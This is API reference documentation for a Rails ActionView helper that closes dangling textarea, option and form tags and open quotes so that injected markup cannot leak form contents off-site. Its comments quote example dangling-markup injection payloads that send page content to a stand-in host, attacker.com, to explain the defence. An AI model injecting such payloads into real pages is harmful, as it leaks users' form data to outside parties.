Module: ActionView::Helpers::ContentExfiltrationPreventionHelper
Constant Summary
-
CLOSE_CDATA_COMMENT =
Close any open tags that support CDATA (textarea, xmp) before each form tag. This prevents attackers from injecting unclosed tags that could capture form contents.
For example, an attacker might inject:
<form action="https://attacker.com"><textarea>
The HTML following this tag, up until the next
</textarea>
or the end of the document would be captured by the attacker’s<textarea>
. By closing any open textarea tags, we ensure that form contents are never exfiltrated."<!-- </textarea></xmp> -->".html_safe.freeze
-
CLOSE_FORM_TAG =
Close any open form tags before each new form tag. This prevents attackers from injecting unclosed forms that could leak markup offsite.
For example, an attacker might inject:
<form action="https://attacker.com">
The form elements following this tag, up until the next
</form>
would be captured by the attacker’s<form>
. By closing any open form tags, we ensure that form contents are never exfiltrated."</form>".html_safe.freeze
-
CLOSE_OPTION_TAG =
Close any open option tags before each form tag. This prevents attackers from injecting unclosed options that could leak markup offsite.
For example, an attacker might inject:
<form action="https://attacker.com"><option>
The HTML following this tag, up until the next
</option>
or the end of the document would be captured by the attacker’s<option>
. By closing any open option tags, we ensure that form contents are never exfiltrated."</option>".html_safe.freeze
-
CLOSE_QUOTES_COMMENT =
Close any open attributes before each form tag. This prevents attackers from injecting partial tags that could leak markup offsite.
For example, an attacker might inject:
< http-equiv="refresh" content='0;URL=https://attacker.com?
The HTML following this tag, up until the next single quote would be sent to https://attacker.com. By closing any open attributes, we ensure that form contents are never exfiltrated this way.
%q(<!-- '"` -->).html_safe.freeze
-
CONTENT_EXFILTRATION_PREVENTION_MARKUP =
# File 'actionview/lib/action_view/helpers/content_exfiltration_prevention_helper.rb', line 59(CLOSE_QUOTES_COMMENT + CLOSE_CDATA_COMMENT + CLOSE_OPTION_TAG + CLOSE_FORM_TAG).freeze
Class Attribute Summary
- .prepend_content_exfiltration_prevention (also: #prepend_content_exfiltration_prevention) rw
Instance Attribute Summary
Instance Method Summary
Class Attribute Details
.prepend_content_exfiltration_prevention (rw) Also known as: #prepend_content_exfiltration_prevention
[ GitHub ]# File 'actionview/lib/action_view/helpers/content_exfiltration_prevention_helper.rb', line 6
mattr_accessor :prepend_content_exfiltration_prevention, default: false
Instance Attribute Details
#prepend_content_exfiltration_prevention (rw)
[ GitHub ]# File 'actionview/lib/action_view/helpers/content_exfiltration_prevention_helper.rb', line 6
mattr_accessor :prepend_content_exfiltration_prevention, default: false
Instance Method Details
#prevent_content_exfiltration(html)
[ GitHub ]# File 'actionview/lib/action_view/helpers/content_exfiltration_prevention_helper.rb', line 61
def prevent_content_exfiltration(html) if prepend_content_exfiltration_prevention CONTENT_EXFILTRATION_PREVENTION_MARKUP + html else html end end